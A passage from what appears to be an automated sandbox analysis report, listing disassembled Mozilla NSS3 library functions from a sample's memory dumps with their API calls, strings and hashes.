                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                              • String ID: security
                                                                                                                                              • API String ID: 3323615905-3315324353
                                                                                                                                              • Opcode ID: 7da1b89c4d4878e0c870b65e7a79600608f0e622d2de5da66ff0e3fa050bdd6c
                                                                                                                                              • Instruction ID: 064460ce8181ff51a4ab2d13fb3278918617d9c8da9fc2e85191e073d905ea36
                                                                                                                                              • Opcode Fuzzy Hash: 7da1b89c4d4878e0c870b65e7a79600608f0e622d2de5da66ff0e3fa050bdd6c
                                                                                                                                              • Instruction Fuzzy Hash: C61180729002186BD7209666AF4DBBBB278AF4171DF444934EC1462F40FB74A70CCAE7
                                                                                                                                              Function 6C732CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_InitToken), ref: 6C732CEC
                                                                                                                                              • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C732D07
                                                                                                                                                • Part of subcall function 6C8109D0: PR_Now.NSS3 ref: 6C810A22
                                                                                                                                                • Part of subcall function 6C8109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35
                                                                                                                                                • Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
                                                                                                                                                • Part of subcall function 6C8109D0: PR_GetCurrentThread.NSS3 ref: 6C810A70
                                                                                                                                                • Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
                                                                                                                                                • Part of subcall function 6C8109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
                                                                                                                                                • Part of subcall function 6C8109D0: PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
                                                                                                                                                • Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810B19
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
                                                                                                                                                • Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
                                                                                                                                                • Part of subcall function 6C8109D0: PR_LogFlush.NSS3 ref: 6C810C7E
                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C732D22
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810B88
                                                                                                                                                • Part of subcall function 6C8109D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C810C5D
                                                                                                                                                • Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C810C8D
                                                                                                                                                • Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810C9C
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810CD1
                                                                                                                                                • Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C810CEC
                                                                                                                                                • Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810CFB
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810D16
                                                                                                                                                • Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C810D26
                                                                                                                                                • Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810D35
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C810D65
                                                                                                                                                • Part of subcall function 6C8109D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C810D70
                                                                                                                                                • Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810D90
                                                                                                                                                • Part of subcall function 6C8109D0: free.MOZGLUE(00000000), ref: 6C810D99
                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C732D3B
                                                                                                                                                • Part of subcall function 6C8109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C810BAB
                                                                                                                                                • Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810BBA
                                                                                                                                                • Part of subcall function 6C8109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810D7E
                                                                                                                                              • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C732D54
                                                                                                                                                • Part of subcall function 6C8109D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C810BCB
                                                                                                                                                • Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810BDE
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(?), ref: 6C810C16
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                              • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                              • API String ID: 420000887-1567254798
                                                                                                                                              • Opcode ID: 47578aa3061a74ee25ef9b56228af4af52c3e68ef68d27c3d5f106f93df604b5
                                                                                                                                              • Instruction ID: 6856a56f25967eaefc981f22ed909b3956ff5750b841cd79700bf2c10bd0b7bb
                                                                                                                                              • Opcode Fuzzy Hash: 47578aa3061a74ee25ef9b56228af4af52c3e68ef68d27c3d5f106f93df604b5
                                                                                                                                              • Instruction Fuzzy Hash: 2621F175205054AFDB219B55DF4DA693BB5EB8231DF046470F5089BB23CB38A858CBE1
                                                                                                                                              Function 6C810EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(Aborting,?,6C6F2357), ref: 6C810EB8
                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C6F2357), ref: 6C810EC0
                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C810EE6
                                                                                                                                                • Part of subcall function 6C8109D0: PR_Now.NSS3 ref: 6C810A22
                                                                                                                                                • Part of subcall function 6C8109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35
                                                                                                                                                • Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
                                                                                                                                                • Part of subcall function 6C8109D0: PR_GetCurrentThread.NSS3 ref: 6C810A70
                                                                                                                                                • Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
                                                                                                                                                • Part of subcall function 6C8109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
                                                                                                                                                • Part of subcall function 6C8109D0: PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
                                                                                                                                                • Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810B19
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
                                                                                                                                                • Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
                                                                                                                                                • Part of subcall function 6C8109D0: PR_LogFlush.NSS3 ref: 6C810C7E
                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C810EFA
                                                                                                                                                • Part of subcall function 6C6FAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C6FAF0E
                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F16
                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F1C
                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F25
                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C810F2B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                              • API String ID: 3905088656-1374795319
                                                                                                                                              • Opcode ID: 199c7f2a02c49eeafef970717460c95968a5641a3ab1ae3a49c3ed7b48723253
                                                                                                                                              • Instruction ID: 325c1dda61198b920c477df8adbc04f468b77440543c4db2ba49722e2fe7e217
                                                                                                                                              • Opcode Fuzzy Hash: 199c7f2a02c49eeafef970717460c95968a5641a3ab1ae3a49c3ed7b48723253
                                                                                                                                              • Instruction Fuzzy Hash: E6F0A4B59001187BDA617B609C49C9B3E2DDF46269F404834FD0956603DB79E924DAF3
                                                                                                                                              Function 6C774DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6C774DCB
                                                                                                                                                • Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
                                                                                                                                                • Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
                                                                                                                                                • Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C774DE1
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C774DFF
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C774E59
                                                                                                                                                • Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C83300C,00000000), ref: 6C774EB8
                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C774EFF
                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C774F56
                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C77521A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1025791883-0
                                                                                                                                              • Opcode ID: 8e62f1bccbfc14d8ddd926f430311ba46d80deae4e9d6143c5c70575dd052f94
                                                                                                                                              • Instruction ID: 3e7a4717d974f12adccb4836e9cfff8d1d25040f1b4190da259b7fc3db865403
                                                                                                                                              • Opcode Fuzzy Hash: 8e62f1bccbfc14d8ddd926f430311ba46d80deae4e9d6143c5c70575dd052f94
                                                                                                                                              • Instruction Fuzzy Hash: D7F19B71E00209CBDF24CF54EA447AEB7B2BF44358F258129E915AB781E775E981CFA0
                                                                                                                                              Function 6C6A2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6A2F3D
                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C6A2FB9
                                                                                                                                              • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C6A3005
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C6A30EE
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6A3131
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6A3178
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memsetsqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 984749767-598938438
                                                                                                                                              • Opcode ID: b604f949c0516d0b01da5057a84f7987d4f377abd493ced042d895d8d4f87fef
                                                                                                                                              • Instruction ID: c3b291e8c95163d7e5a2a7cfe72f24221d79b8757bdd0853435af52e6ca0a051
                                                                                                                                              • Opcode Fuzzy Hash: b604f949c0516d0b01da5057a84f7987d4f377abd493ced042d895d8d4f87fef
                                                                                                                                              • Instruction Fuzzy Hash: 14B18DB0E052199BCB18CFDDC885AEEB7B1BF49304F148529E849A7B41D374DD42CBA8
                                                                                                                                              Function 6C71FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C71FCBD
                                                                                                                                              • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C71FCCC
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C71FCEF
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C71FD32
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C71FD46
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000001), ref: 6C71FD51
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C71FD6D
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C71FD84
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                              • String ID: :
                                                                                                                                              • API String ID: 183580322-336475711
                                                                                                                                              • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                              • Instruction ID: 8b8ddf341b8283f30729024ec7fa57458d943361f99ae01168f41c6bca215111
                                                                                                                                              • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                              • Instruction Fuzzy Hash: DE31E2B29182065BEB108EA8DE1A7BF77A8AF45358F190534DC59A7F00E771E908C7D2
                                                                                                                                              Function 6C736C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_DigestInit), ref: 6C736C66
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C736C94
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C736CA3
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C736CB9
                                                                                                                                              • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C736CD5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                              • API String ID: 1003633598-3690128261
                                                                                                                                              • Opcode ID: 32861e6dd04f6e70c20d2c47e788edbfb21695d8db4093cf15d7af48eeed4d62
                                                                                                                                              • Instruction ID: 1163715778a3afe0dee5052f636e1e3c9e6b50d696fca48f51abdc26a2efb1c1
                                                                                                                                              • Opcode Fuzzy Hash: 32861e6dd04f6e70c20d2c47e788edbfb21695d8db4093cf15d7af48eeed4d62
                                                                                                                                              • Instruction Fuzzy Hash: 672125306051249BDB219B25DF4DFAA37B5EB8231CF446435E40D9BB03DB38A948C7D6
                                                                                                                                              Function 6C739DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_SessionCancel), ref: 6C739DF6
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C739E24
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C739E33
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C739E49
                                                                                                                                              • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6C739E65
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                                                                                                              • API String ID: 1003633598-1678415578
                                                                                                                                              • Opcode ID: 0582ebca2c56e2cfe6dabd4d417c8264b5d20d22b51d1726b85024968aa463a0
                                                                                                                                              • Instruction ID: eff496e9c80e4c76eae3fac8b8419011c7023d561c0a6b01efba12f17de64334
                                                                                                                                              • Opcode Fuzzy Hash: 0582ebca2c56e2cfe6dabd4d417c8264b5d20d22b51d1726b85024968aa463a0
                                                                                                                                              • Instruction Fuzzy Hash: B0212872646124AFD7209B15DF8CB7A33B9AB4230DF446434E80D5BB42DF38A848C7D6
                                                                                                                                              Function 6C706DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,6C707D8F,6C707D8F,?,?), ref: 6C706DC8
                                                                                                                                                • Part of subcall function 6C75FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C75FE08
                                                                                                                                                • Part of subcall function 6C75FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C75FE1D
                                                                                                                                                • Part of subcall function 6C75FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C75FE62
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C707D8F,?,?), ref: 6C706DD5
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C828FA0,00000000,?,?,?,?,6C707D8F,?,?), ref: 6C706DF7
                                                                                                                                                • Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095
                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C706E35
